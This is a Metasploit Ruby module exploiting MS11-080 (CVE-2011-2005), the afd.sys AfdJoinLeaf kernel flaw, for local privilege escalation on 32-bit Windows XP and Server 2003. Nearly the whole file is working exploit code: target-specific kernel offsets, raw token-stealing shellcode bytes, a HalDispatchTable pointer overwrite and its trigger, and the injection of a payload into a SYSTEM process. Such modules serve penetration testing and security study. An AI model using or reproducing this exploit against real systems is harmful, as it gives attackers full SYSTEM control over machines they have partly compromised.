323 lines
12 KiB
Ruby
323 lines
12 KiB
Ruby
##
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# This module requires Metasploit: http//metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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require 'rex'
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class Metasploit3 < Msf::Exploit::Local
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Rank = AverageRanking
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# Average because this module relies on memory corruption within the
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# kernel, this is inherently dangerous. Also if the payload casues
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# the system process that it was injected into to die then it's also
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# possible that the system may become unstable.
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include Msf::Post::Windows::Priv
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def initialize(info={})
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super(update_info(info, {
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'Name' => 'MS11-080 AfdJoinLeaf Privilege Escalation',
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'Description' => %q{
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This module exploits a flaw in the AfdJoinLeaf function of the
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afd.sys driver to overwrite data in kernel space. An address
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within the HalDispatchTable is overwritten and when triggered
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with a call to NtQueryIntervalProfile will execute shellcode.
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This module will elevate itself to SYSTEM, then inject the payload
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into another SYSTEM process before restoring it's own token to
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avoid causing system instability.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'Matteo Memelli', # original exploit and all the hard work
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'Spencer McIntyre' # MSF module
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],
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'Arch' => [ ARCH_X86 ],
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'Platform' => [ 'win' ],
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'SessionTypes' => [ 'meterpreter' ],
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'DefaultOptions' =>
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{
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'EXITFUNC' => 'thread',
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},
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'Targets' =>
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[
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[ 'Automatic', { } ],
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[ 'Windows XP SP2 / SP3',
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{
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'HaliQuerySystemInfo' => 0x16bba,
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'HalpSetSystemInformation' => 0x19436,
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'_KPROCESS' => "\x44",
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'_TOKEN' => "\xc8",
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'_UPID' => "\x84",
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'_APLINKS' => "\x88"
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}
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],
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[ 'Windows Server 2003 SP2',
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{
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'HaliQuerySystemInfo' => 0x1fa1e,
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'HalpSetSystemInformation' => 0x21c60,
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'_KPROCESS' => "\x38",
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'_TOKEN' => "\xd8",
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'_UPID' => "\x94",
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'_APLINKS' => "\x98"
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}
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],
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],
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'References' =>
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[
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[ 'CVE', '2011-2005' ],
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[ 'OSVDB', '76232' ],
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[ 'EDB', '18176' ],
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[ 'MSB', 'MS11-080' ],
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[ 'URL', 'http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/' ]
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],
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'DisclosureDate'=> 'Nov 30 2011',
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'DefaultTarget' => 0
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}))
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register_options([
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])
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end
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def find_sys_base(drvname)
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session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
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session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
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session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
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results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
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addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
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addresses.each do |address|
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results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
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current_drvname = results['lpBaseName'][0..results['return'] - 1]
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if drvname == nil
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if current_drvname.downcase.include?('krnl')
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return [address, current_drvname]
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end
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elsif drvname == results['lpBaseName'][0..results['return'] - 1]
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return [address, current_drvname]
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end
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end
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end
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# Function borrowed from smart_hashdump
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def get_system_proc
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# Make sure you got the correct SYSTEM Account Name no matter the OS Language
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local_sys = resolve_sid("S-1-5-18")
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system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
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# Processes that can Blue Screen a host if migrated in to
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dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
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session.sys.process.processes.each do |p|
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# Check we are not migrating to a process that can BSOD the host
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next if dangerous_processes.include?(p["name"])
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next if p["pid"] == session.sys.process.getpid
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next if p["pid"] == 4
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next if p["user"] != system_account_name
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return p
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end
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end
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def exploit
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if sysinfo["Architecture"] =~ /wow64/i
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print_error("Running against WOW64 is not supported")
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return
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elsif sysinfo["Architectore"] =~ /x64/
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print_error("Running against 64-bit systems is not supported")
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return
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end
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mytarget = target
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if mytarget.name =~ /Automatic/
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os = sysinfo["OS"]
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if os =~ /windows xp/i
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mytarget = targets[1]
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end
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if ((os =~ /2003/) and (os =~ /service pack 2/i))
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mytarget = targets[2]
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end
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if ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
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mytarget = targets[2]
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end
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if mytarget.name =~ /Automatic/
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print_error("Could not identify the target system, it may not be supported")
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return
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end
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print_status("Running against #{mytarget.name}")
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end
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if is_system?
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print_error("This meterpreter session is already running as SYSTEM")
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return
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end
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this_proc = session.sys.process.open
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kernel_info = find_sys_base(nil)
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base_addr = 0x1001
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print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
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result = session.railgun.ws2_32.WSASocketA("AF_INET", "SOCK_STREAM", "IPPROTO_TCP", nil, nil, 0)
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socket = result['return']
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irpstuff = rand_text_alpha(8)
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irpstuff << "\x00\x00\x00\x00"
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irpstuff << rand_text_alpha(4)
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irpstuff << "\x01\x00\x00\x00"
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irpstuff << "\xe8\x00" + "4" + "\xf0\x00"
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irpstuff << rand_text_alpha(231)
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if not this_proc.memory.writable?(0x1000)
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session.railgun.add_function(
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'ntdll',
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'NtAllocateVirtualMemory',
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'DWORD',
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[
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["DWORD", "ProcessHandle", "in"],
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["PBLOB", "BaseAddress", "inout"],
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["PDWORD", "ZeroBits", "in"],
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["PBLOB", "RegionSize", "inout"],
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["DWORD", "AllocationType", "in"],
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["DWORD", "Protect", "in"]
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])
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result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ base_addr ].pack("L"), nil, [ 0x1000 ].pack("L"), "MEM_COMMIT | MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
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end
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if not this_proc.memory.writable?(0x1000)
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print_error('Failed to properly allocate memory')
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return
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end
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this_proc.memory.write(0x1000, irpstuff)
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hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
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hKernel = hKernel['return']
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halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
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halDispatchTable = halDispatchTable['return']
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halDispatchTable -= hKernel
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halDispatchTable += kernel_info[0]
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print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
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halbase = find_sys_base("hal.dll")[0]
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haliQuerySystemInformation = halbase + mytarget['HaliQuerySystemInfo']
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halpSetSystemInformation = halbase + mytarget['HalpSetSystemInformation']
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print_status("HaliQuerySystemInformation Address: 0x#{haliQuerySystemInformation.to_s(16)}")
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print_status("HalpSetSystemInformation Address: 0x#{halpSetSystemInformation.to_s(16)}")
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#### Exploitation ####
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shellcode_address_dep = 0x0002071e
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shellcode_address_nodep = 0x000207b8
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padding = make_nops(2)
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halDispatchTable0x4 = halDispatchTable + 0x4
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halDispatchTable0x8 = halDispatchTable + 0x8
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restore_ptrs = "\x31\xc0"
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restore_ptrs << "\xb8" + [ halpSetSystemInformation ].pack("L")
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restore_ptrs << "\xa3" + [ halDispatchTable0x8 ].pack("L")
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restore_ptrs << "\xb8" + [ haliQuerySystemInformation ].pack("L")
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restore_ptrs << "\xa3" + [ halDispatchTable0x4 ].pack("L")
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tokenstealing = "\x52"
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tokenstealing << "\x53"
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tokenstealing << "\x33\xc0"
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tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"
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tokenstealing << "\x8b\x40" + mytarget['_KPROCESS']
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tokenstealing << "\x8b\xc8"
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tokenstealing << "\x8b\x98" + mytarget['_TOKEN'] + "\x00\x00\x00"
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tokenstealing << "\x89\x1d\x00\x09\x02\x00"
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tokenstealing << "\x8b\x80" + mytarget['_APLINKS'] + "\x00\x00\x00"
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tokenstealing << "\x81\xe8" + mytarget['_APLINKS'] + "\x00\x00\x00"
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tokenstealing << "\x81\xb8" + mytarget['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"
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tokenstealing << "\x75\xe8"
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tokenstealing << "\x8b\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
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tokenstealing << "\x8b\xc1"
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tokenstealing << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
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tokenstealing << "\x5b"
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tokenstealing << "\x5a"
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tokenstealing << "\xc2\x10"
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restore_token = "\x52"
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restore_token << "\x33\xc0"
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restore_token << "\x64\x8b\x80\x24\x01\x00\x00"
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restore_token << "\x8b\x40" + mytarget['_KPROCESS']
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restore_token << "\x8b\x15\x00\x09\x02\x00"
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restore_token << "\x89\x90" + mytarget['_TOKEN'] + "\x00\x00\x00"
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restore_token << "\x5a"
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restore_token << "\xc2\x10"
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shellcode = padding + restore_ptrs + tokenstealing
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this_proc.memory.write(shellcode_address_dep, shellcode)
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this_proc.memory.write(shellcode_address_nodep, shellcode)
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this_proc.memory.protect(0x00020000)
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addr = [ 2, 4455, 0x7f000001, 0, 0 ].pack("s!S!L!L!L!")
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result = session.railgun.ws2_32.connect(socket, addr, addr.length)
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if result['return'] != 0xffffffff
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print_error("The socket is not in the correct state")
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return
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end
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session.railgun.add_function(
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'ntdll',
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'NtDeviceIoControlFile',
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'DWORD',
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[
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[ "DWORD", "FileHandle", "in" ],
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[ "DWORD", "Event", "in" ],
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[ "DWORD", "ApcRoutine", "in" ],
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[ "DWORD", "ApcContext", "in" ],
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[ "PDWORD", "IoStatusBlock", "out" ],
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[ "DWORD", "IoControlCode", "in" ],
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[ "LPVOID", "InputBuffer", "in" ],
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[ "DWORD", "InputBufferLength", "in" ],
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[ "LPVOID", "OutputBuffer", "in" ],
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[ "DWORD", "OutPutBufferLength", "in" ]
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])
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session.railgun.add_function(
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'ntdll',
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'NtQueryIntervalProfile',
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'DWORD',
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[
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[ "DWORD", "ProfileSource", "in" ], [ "PDWORD", "Interval", "out" ]
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])
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print_status("Triggering AFDJoinLeaf pointer overwrite...")
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result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
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result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
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if not is_system?
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print_error("Exploit failed")
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return
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end
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begin
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proc = get_system_proc
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print_status("Injecting the payload into SYSTEM process: #{proc["name"]} PID: #{proc["pid"]}")
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host_process = client.sys.process.open(proc["pid"], PROCESS_ALL_ACCESS)
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mem = host_process.memory.allocate(payload.encoded.length + (payload.encoded.length % 1024))
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print_status("Writing #{payload.encoded.length} bytes at address #{"0x%.8x" % mem}")
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host_process.memory.write(mem, payload.encoded)
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host_process.thread.create(mem, 0)
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rescue ::Exception => e
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print_error("Failed to Inject Payload")
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print_error(e.to_s)
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end
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# Restore the token because apparently BSODs are frowned upon
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print_status("Restoring the original token...")
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shellcode = padding + restore_ptrs + restore_token
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this_proc.memory.write(shellcode_address_dep, shellcode)
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this_proc.memory.write(shellcode_address_nodep, shellcode)
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result = session.railgun.ntdll.NtDeviceIoControlFile(socket, 0, 0, 0, 4, 0x000120bb, 0x1004, 0x108, halDispatchTable0x4 + 0x1, 0)
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result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
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end
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end
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